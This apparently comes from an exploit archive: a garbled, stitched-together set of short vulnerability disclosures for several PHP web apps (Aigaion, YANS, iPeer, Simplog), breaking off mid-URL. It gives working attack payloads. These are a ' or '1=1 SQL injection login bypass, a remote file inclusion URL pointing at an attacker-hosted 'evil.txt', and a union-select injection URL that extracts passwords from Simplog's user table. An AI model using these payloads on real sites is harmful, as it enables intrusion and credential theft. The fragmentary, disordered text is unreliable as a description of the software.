This is bogus, about 5-10 lines above it includes a file which declares
$pathToFiles.
include ('./setup_options.php');
if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
$langOrig=$lang;
Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum
Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/
vuln code:
$resultado = mysql_query(SELECT * FROM users WHERE username='$username' AND
password='$password') or die (mysql_error());
simple sql injection
' or '1=1
' or '1=1
-navairum
';
$handle=fopen($file,'r');
while(!feof($handle))
{
if($handle)
{
$data = fgets($handle,filesize($file));
$data.='br';
}
else
{
echo 'handle failed';
}
echo $data;
}
exit(0);
?
Navairum
legalize it
can also change the
background, title, and css page through this file.
-navairum
Product:http://ipeer.apsc.ubc.ca/ipeer_site/
version: 2.0 (I assume others too)
vulnerability:
http://some_host/ipeer_site/?page=http://evilness/evil.txt?
Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)
There are a few sql injections available with this software. This one is in
preview.php
eg.
http://site/preview.php?blogid=2adm=temtid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert